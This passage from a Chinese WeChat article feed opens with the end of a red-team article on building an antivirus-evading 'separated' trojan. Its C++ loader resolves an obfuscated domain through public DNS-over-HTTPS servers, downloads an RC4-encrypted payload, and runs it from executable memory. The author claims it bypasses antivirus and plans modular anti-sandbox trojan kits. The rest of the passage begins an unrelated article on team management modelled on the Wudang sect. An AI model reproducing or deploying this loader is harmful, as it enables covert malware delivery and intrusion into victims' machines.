style="mso-bookmark:bBRb5;"><span style="font-family:宋体;"></span></span> </h2><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__meta"># <span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;iostream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta"># <span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&#34;dns-over-https.h&#34;</span></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">pragma</span> comment(lib, <span class="code-snippet__meta-string">&#34;dns-over-https-MD.lib&#34;</span>)</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">pragma</span> comment(lib, <span class="code-snippet__meta-string">&#34;dns-over-https-MT.lib&#34;</span>)</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">void</span> <span class="code-snippet__title">runShellcode</span><span class="code-snippet__params">(<span class="code-snippet__built_in">string</span> shellcode_str)</span> </span>{</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 这里的VirtualAlloc可以通过动态加载地址的方式隐藏API调用；</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 如果想彻底避免R3 API Hook，也可以直接使用syscall；</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 本文主要关注分离免杀和流量隐匿，故不做展开。</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">void</span>* exec = VirtualAlloc(<span class="code-snippet__number">0</span>, shellcode_str.size(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (exec != <span class="code-snippet__literal">NULL</span>) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">memcpy</span>(exec, shellcode_str.c_str(), shellcode_str.size());</span></code><code><span class="code-snippet_outer">        ((<span class="code-snippet__keyword">void</span>(*)())exec)();</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">findValidDohServer</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> tmpAddr = <span class="code-snippet__string">&#34;&#34;</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">while</span> (TRUE) {</span></code><code><span class="code-snippet_outer">        srand(time(<span class="code-snippet__literal">NULL</span>));</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">int</span> randIndex = rand() % <span class="code-snippet__number">16</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">char</span> dohServerList[<span class="code-snippet__number">16</span>][<span class="code-snippet__number">256</span>] = {</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;208.67.222.222&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;208.67.220.220&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;1.0.0.1&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;1.1.1.1&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;8.8.8.8&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;8.8.4.4&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;185.222.222.222&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;185.184.222.222&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;223.5.5.5&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;223.6.6.6&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;120.53.53.53&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;1.12.12.12&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;101.199.113.208&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;36.99.170.86&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;180.163.249.75&#34;</span>,</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__string">&#34;175.24.154.66&#34;</span>,</span></code><code><span class="code-snippet_outer">        };</span></code><code><span class="code-snippet_outer">        tmpAddr = dohServerList[randIndex];</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> (isTCPPortOpen(tmpAddr, <span class="code-snippet__number">443</span>)) {</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">break</span>;</span></code><code><span class="code-snippet_outer">        }</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">else</span> {</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">continue</span>;</span></code><code><span class="code-snippet_outer">        }</span></code><code><span class="code-snippet_outer">        </span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__string">&#34;https://&#34;</span> + tmpAddr + <span class="code-snippet__string">&#34;/dns-query&#34;</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">int</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">(<span class="code-snippet__keyword">int</span> argc, <span class="code-snippet__keyword">char</span>** argv)</span></span></span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> encodedDomainName = <span class="code-snippet__string">&#34;P9g*****************************2tWD297e2AZ=&#34;</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> decodedDomainName = hex_decode(base64_decode(encodedDomainName));</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> encodedPath = <span class="code-snippet__string">&#34;PcSDP********************************AWB7cZo&#34;</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> decodedPath = hex_decode(base64_decode(encodedPath));</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> key = <span class="code-snippet__string">&#34;***********************&#34;</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> ipRes = secureGetHostByName(findValidDohServer().c_str(), (<span class="code-snippet__keyword">char</span>*)decodedDomainName.data(), <span class="code-snippet__number">443</span>).addr;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> data = httpsGet((<span class="code-snippet__keyword">char</span>*)decodedDomainName.data(), ipRes, decodedPath);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">string</span> shellcode_str = rc4_encrypt_decrypt(hex_decode(base64_decode(data)), key);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (shellcode_str.size() &gt; <span class="code-snippet__number">0</span>)</span></code><code><span class="code-snippet_outer">        runShellcode(shellcode_str);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);"></span></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);">如代码所示，没有做任何免杀</span><span style="font-family: Calibri;font-size: 11pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);">处理</span></span><span style="font-family: Calibri;font-size: 11pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);">，只是没有内置beacon</span></span><span style="font-family: Calibri;font-size: 11pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);"> shellcode</span></span><span style="font-family: Calibri;font-size: 11pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 11pt;font-family: 宋体;color: rgb(0, 0, 0);">。这个demo中的16个IP地址就是国内外常用的支持DoH的域名服务器（实际上还有更多）。这里我写的是随机取，当然也可以做有限次数的轮询，确保使用可以访问的服务器。防守方再疯狂也不至于上来就封掉所有域名服务器地址吧......</span></span></h2><section style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;text-align: left;line-height: 2em;margin-bottom: 8px;margin-top: 8px;"><span style="mso-bookmark:uccacc51e;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">但根据免杀效果的测试来看，已经轻松过关了。</span></span><span style="mso-bookmark:uccacc51e;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"></span></span></section><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:uccacc51e;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"><br/></span></span></p><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:uccacc51e;"></span></h2><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p><br/></p><p><strong style="font-size: 24px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span style="font-family: 宋体;">5. 总结</span>   </strong><br/></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:hBWyu;"></span><span style="mso-bookmark:u65add3ed;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">比起几年前不成熟的尝试，这次做的分离木马没有再过多关注木马本身，主要精力放在了模块化开发上。因为首先对于如何执行shellcode的骚操作有很多，每个会写木马的都有一些自己独到的想法，但每人写的源码都互不兼容，如果在项目中有快速开发/修改的需求的话就会很被动。所以不管是DoH模块、https请求模块，还是另一个自写库函数中的反沙箱/反调试模块，都旨在可以实现快速的“搭积木式”木马开发。比如当我们想做个最普通的钓鱼木马时，只导入一个反调试模块就好，如果防守比较严格的情况下需要做分离木马，但又最好是单文件，那么就可以尝试这种远程加载的方式，导入对应模块调用封装好的函数即可快速成形。这些库函数集合日后还会不定期更新，后面也会看需求加入一些各种各样的执行shellcode的花活。</span></span><span style="mso-bookmark:u65add3ed;"></span><span style="mso-bookmark:ud86b3760;"><span style="font-family:Calibri;"></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5888888888888889" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8f1b0b86&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzecOicArORpxiaGUpbJB7FKFyia31lKNyvNQe9rz8yJEFyPs1xHQWfcg9icw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:u65add3ed;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484040">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=58c13fcf&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484040%26idx%3D1%26sn%3D424879af2c898b1de8d899b7ab4d5f11%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 24 Jul 2023 23:52:00 +0800</pubDate>
    </item>
    <item>
      <title>武当派的团队管理启示录</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483977&amp;idx=1&amp;sn=2c9039c83ab3ae59cba2c80a6d3f263c</link>
      <description>作为一个门派，武当派有技术、有人才、有活力、有法度，作为一个创业者，张三丰有毅力、有胸襟、有情怀、有分寸，这样的门派如果不成功简直天理难容。本文从人员招聘、企业文化、团队建设、人才梯队、复利主义、创新意识、奖惩等维度分析武当派的团队管理。</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2023-07-23 23:44</span> <span style="display: inline-block;">北京</span>
</p>

<p>作为一个门派，武当派有技术、有人才、有活力、有法度，作为一个创业者，张三丰有毅力、有胸襟、有情怀、有分寸，这样的门派如果不成功简直天理难容。本文从人员招聘、企业文化、团队建设、人才梯队、复利主义、创新意识、奖惩等维度分析武当派的团队管理。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4abd8fc6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtINV8F97wUxmkuXxiboJaY1nfnJXyL4SR044Dowtr3iaWiblXE7S7rYwPgZS0easv4ellw5yotsnxYIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;text-indent: 21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">作为一个门派，武当派有技术、有人才、有活力、有法度，作为一个创业者，张三丰有毅力、有胸襟、有情怀、有分寸，这样的门派如果不成功简直天理难容。本文从人员招聘、企业文化、团队建设、人才梯队、复利主义、创新意识、奖惩等维度分析武当派的团队管理。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:415.3pt;height:261.05pt;"><imagedata title="image1"></imagedata></shape><img class="rich_pages wxw-img" data-ratio="0.628158844765343" style="width:553.739990234375px;height:348.07000732421875px;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=1c71638c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtINV8F97wUxmkuXxiboJaY1nNJQZzC0beydzmCxnIibF0iasGvlFoiboBpnjew5PwZaSHVjE31u1IYcKg%2F640%3Fwx_fmt%3Dpng"/></span></section><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">一、人员招聘</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="568" valign="top" style="width: 426.1pt;border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;word-break: break-all;"><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">第11章</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;font-style: italic;">张三丰收徒之先，对每人的品德行为、资质悟性，都曾详加查考，因此七弟子入门之后，无一不成大器，不但各传师门之学，且能各依自己天性所近，另创新招。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><br/></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">第12章</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;"><span style="font-family: 微软雅黑;font-style: italic;">武当诸侠直到近年方始收徒，但拣选甚严，若非根骨资质、品行性情无一不佳，决不能投入武当门下。</span></span></section></td></tr></tbody></table><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;">1.</span><span style="font-size: 14px;font-family: 微软雅黑;">个人品德价值观的融入</span></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">a)不仅仅要要有天赋（修炼上层武功的基础/高端技术的前提）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">b)品行要正（<span style="font-family: 微软雅黑;font-size: 14px;text-align: left;text-indent: -21pt;text-wrap: wrap;letter-spacing: 0.034em;">最起码要跟团队价值观保持步调一致；</span><span style="font-family: 微软雅黑;font-size: 14px;text-align: left;text-indent: -21pt;text-wrap: wrap;letter-spacing: 0.034em;">例如，行侠仗义</span>）</span><span style="text-indent: -21pt;letter-spacing: 0.034em;"></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">2.</span><span style="font-size: 14px;font-family: 微软雅黑;">天赋和能力 能够决定做成事；但品德好，才能持续做成好事（为国为民），且团队可传承的重要品质。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;"><br/></span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">二、使命愿景价值观</span></p><section style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;margin-bottom: 8px;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">1.</span><span style="font-size: 14px;font-family: 微软雅黑;">使命：对外--抗元复汉</span></section><section style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;margin-bottom: 8px;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">2.愿景：武当一派名垂千古</span></section><section style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;margin-bottom: 8px;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">3.价值观：行侠仗义、匡扶正义</span></section><section style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;margin-bottom: 8px;line-height: 2em;"><span style="text-indent: -21pt;letter-spacing: 0.034em;">业务导向（练习武功，对外输出）；</span><span style="text-indent: -21pt;letter-spacing: 0.034em;">技术需要结合业务做闭环</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">          <br/></span></section><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">三、团队建设</span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">1.团队氛围</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">a)大娃宋远桥，为人宽厚；二娃俞莲舟，面冷心热；六娃殷梨亭，心地善良。七个兄弟里没有败类，三丰出品，必属精品。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">b)和峨眉灭绝师太的培养方案相比，武当张三丰的培养方案绝对更胜一筹。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">c)灭绝总是把希望寄托在一个资质最好的弟子身上，比如纪晓芙、比如周芷若，一旦这一个弟子出点问题，直接导致师父异常失落，另外就是间接导致其他弟子嫉妒，比如丁敏君就经常增加峨眉的管理成本内耗。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">2.</span><span style="font-size: 14px;font-family: 微软雅黑;">师兄弟间的情义</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;text-indent: 21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">金庸先生曾说，《倚天屠龙记》主要的侧重点其实是父子与兄弟之情，而并非男女之情。的确倚天中确实有很多值得赞叹的兄弟情，以宋远桥为首的“武当七侠”之间的兄弟情。</span></section><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="568" valign="top" style="width: 426.1pt;border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;word-break: break-all;"><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-size: 14px;font-family: 微软雅黑;"># 张翠山与俞莲舟：</span></strong><span style="font-size: 14px;font-family: 微软雅黑;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">张翠山待妻子走出船舱，说道：“二哥，这十年之中，我……”俞莲舟左手一摆，说道：“五弟，你我肝胆相照，情逾骨肉，便有天大的祸事，二哥也跟你生死与共。你夫妻之事，暂且不必跟我说，回到山上，专候师父示下便了。师父若是责怪，咱们七兄弟一齐跪地苦求，你孩子都这般大了，难道师父还会硬要你夫妻父子生生分离？”张翠山大喜，说道：“多谢二哥。”</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">                  <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-size: 14px;font-family: 微软雅黑;"># 张翠山与莫声谷：</span></strong><span style="font-size: 14px;font-family: 微软雅黑;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">莫声谷站起身来，大声道：“别说我五哥此刻尚未回山，便是已经回到武当，也只是这句话。莫某跟张翠山生死与共，他的事便是我的事。三位不分青红皂白，定要诬赖我五哥害了龙门镖局满门。好！这一切便全算是莫某干的。三位要替龙门镖局报仇，尽管往莫某身上招呼。我五哥不在此间，莫声谷便是张翠山，张翠山便是莫声谷。老实跟你说，莫某的武功智谋，远远不及我五哥，你们找上了我，算你们运气不坏。”</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">                  <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-size: 14px;font-family: 微软雅黑;"># 张三丰与张翠山</span></strong><span style="font-size: 14px;font-family: 微软雅黑;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;font-style: italic;">张三丰活了一百岁，修炼了八十几年，胸怀空明，早已不萦万物，但和这七个弟子情若父子，陡然间见到张翠山，忍不住紧紧搂着他，欢喜得流下泪来。</span></section></td></tr></tbody></table><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <br/></span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">四、梯队建设</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;">1.武当七侠，人才梯队</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">a)老大宋远桥精通易理，性情儒雅平和，负责总管内外事务</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">b)老二俞莲舟武日功最高</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">c)老三俞岱岩精明稳重，即使是瘫痪多年以后仍然能临危受命执掌大局</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">d)老四张松溪机智过人</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">e)老五张翠山悟性最佳，文武双全。</span></section><section style="margin-top: 0pt;margin-bottom: 